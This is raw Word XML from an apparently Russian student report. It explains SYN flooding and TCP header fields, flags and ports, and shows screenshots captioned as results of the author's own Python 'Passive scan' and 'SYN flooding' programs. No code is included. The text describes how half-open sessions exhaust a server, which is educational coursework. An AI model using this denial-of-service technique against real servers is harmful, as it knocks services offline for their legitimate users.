          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03219C86" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7E622C" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flooding</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">затопление полуоткрытыми сессиями, переполняющими очереди сервера, после чего сервер перестаёт отвечать на запросы легитимных клиентов. Зачастую достаточно 50-100 ложных сессий и сервер будет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>тормозить</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A89133E" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B41985" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31CECA9A" wp14:editId="653F50FB">
            <wp:extent cx="5940425" cy="3064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803" w14:textId="77777777" w:rsidR="009C2100" w:rsidRDefault="009C2100" w:rsidP="009C2100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73F44F4D" w14:textId="77777777" w:rsidR="009C2100" w:rsidRDefault="009C2100" w:rsidP="009C2100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7E93329B" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="009C2100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70096B67" w14:textId="77777777" w:rsidR="00172782" w:rsidRP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TCP (Transfer Control Protocol) </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28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346A3B71" w14:textId="77777777" w:rsid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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Первая</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>последняя</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>версия</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RFC-793</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Transmission Control Protocol J. Postel Sep-01-1981).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A771C9D" w14:textId="77777777" w:rsid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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7691A692" w14:textId="77777777" w:rsid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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB032B0" w14:textId="77777777" w:rsid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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E956953" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F65165" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Основные особенности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D6B07" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Устанавливается соединение.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FD57E" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Данные передаются </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>сегментами</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28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172782">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>порядковый номер (Sequence Number - SN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> пакета.</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E1678" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Посылает запрос на следующий пакет, указывая его номер в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>"Номер подтверждения" (AS). </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Тем самым, подтверждая получение предыдущего пакета.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0CF50" w14:textId="77777777" w:rsidR="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Делает проверку целостности данных, если пакет битый посылает повторный запрос.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE021D" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4912A19F" wp14:editId="6ACF34F0">
            <wp:extent cx="5940425" cy="2149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62626"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03C20A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Длина заголовка - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>задается словами по 32бита.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37D99F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jc w:val="both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Размер окна</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> - количество байт, которые готов принять получатель без подтверждения.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4501A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jc w:val="both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Контрольная сумма</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> - включает псевдо заголовок, заголовок и данные.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1B6C9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Указатель срочности</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> - указывает последний байт срочных данных, на которые надо немедленно реагировать.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDFF7C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URG - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг срочности, включает поле "Указатель срочности", если =0 то поле игнорируется.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="146EEFF2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lastRenderedPageBreak/>
        <w:t>ACK - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг подтверждение, включает поле "Номер подтверждения, если =0 то поле игнорируется.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7DDB8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PSH - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг требует выполнения операции push, модуль TCP должен срочно передать пакет программе.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601CEA3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RST - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг прерывания соединения, используется для отказа в соединении</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61012F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SYN - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг синхронизация порядковых номеров, используется при установлении соединения.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7723DE" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>FIN - </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>флаг окончание передачи со стороны отправителя</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A7D38B" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00596A88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 xml:space="preserve">По номеру </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>порта</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> транспортные протоколы определяют, какому приложению передать содержимое пакетов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B3172" w14:textId="77777777" w:rsidR="00172782" w:rsidRP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b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Порты</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> могут принимать значение от 0-65535 (два байта 2^16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754B3DC" w14:textId="77777777" w:rsid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 xml:space="preserve">Номера портам присваиваются таким образом: имеются стандартные номера (например, номер 21 закреплен за сервисом </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, 23 - за </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, 80 - за </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>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1784E9C6" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="61090527" w14:textId="77777777" w:rsidR="00172782" w:rsidRP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 xml:space="preserve">Компьютер в сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> может иметь адреса трех уровней (но не менее двух):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32179A29" w14:textId="77777777" w:rsidR="00172782" w:rsidRP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>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/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4E81ED70" w14:textId="77777777" w:rsidR="00172782" w:rsidRP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>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/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697EB3A8" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00172782">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Символьный идентификатор-имя (DNS), например, www.kstu.ru.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF294B" w14:textId="77777777" w:rsidR="00172782" w:rsidRPr="00172782" w:rsidRDefault="00172782" w:rsidP="00172782">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA0065B" w14:textId="77777777" w:rsidR="009C2100" w:rsidRDefault="009C2100" w:rsidP="009C2100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722077F2" w14:textId="77777777" w:rsidR="009C2100" w:rsidRDefault="009C2100" w:rsidP="009C2100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62A6632B" w14:textId="77777777" w:rsidR="00EF0232" w:rsidRDefault="00EF0232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243743F6" w14:textId="77777777" w:rsidR="004B50C9" w:rsidRDefault="004B50C9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7736F7F3" w14:textId="77777777" w:rsidR="002872E8" w:rsidRPr="00596A88" w:rsidRDefault="002872E8" w:rsidP="002872E8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_5swn028am6em" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="7" w:name="_Toc65156182"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="002872E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5DC2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF0232">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Реализация задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="12D31F57" w14:textId="77777777" w:rsidR="00EF0232" w:rsidRDefault="00EF0232" w:rsidP="000E3023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Программу реализовал на</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A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языке программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF0232">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A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="004B50C9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PyCharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Результат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4865FC09" w14:textId="77777777" w:rsidR="000E3023" w:rsidRPr="000E3023" w:rsidRDefault="000E3023" w:rsidP="000E3023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</w:p>
    <w:p w14:paraId="0B82BE4A" w14:textId="32A4EC86" w:rsidR="00A02908" w:rsidRDefault="00C279AB" w:rsidP="00EF0232">
      <w:pPr>
        <w:pStyle w:val="aa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w:r>
        <w:object w:dxaOrig="12759" w:dyaOrig="6396" w14:anchorId="69E938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 o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Unknown" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1681573032" r:id="rId9"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAC844" w14:textId="77777777" w:rsidR="00A02908" w:rsidRPr="00596A88" w:rsidRDefault="000E3023" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="aa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ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidR="004B4A36" w:rsidRPr="004B4A36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Passive</w:t>
      </w:r>
      <w:r w:rsidR="004B4A36" w:rsidRPr="00596A88">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B4A36" w:rsidRPr="004B4A36">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="004B4A36" w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71B90F" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00596A88" w:rsidRDefault="004B4A36" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="aa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ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D564EA" w14:textId="2BB16175" w:rsidR="004B4A36" w:rsidRDefault="00C279AB" w:rsidP="000E3023">
      <w:pPr>
        <w:pStyle w:val="aa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</w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="14886" w:dyaOrig="4264" w14:anchorId="7BE4A843">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:467.25pt;height:134.25pt" o:ole="">
            <v:imagedata r:id="rId10" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Unknown" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1681573033" r:id="rId11"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D577F" w14:textId="77777777" w:rsidR="004B4A36" w:rsidRPr="00596A88" w:rsidRDefault="004B4A36" w:rsidP="004B4A36">
      <w:pPr>
        <w:pStyle w:val="aa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ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00596A88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис 2. Результат работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00596A8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flooding</w:t>
      </w:r>
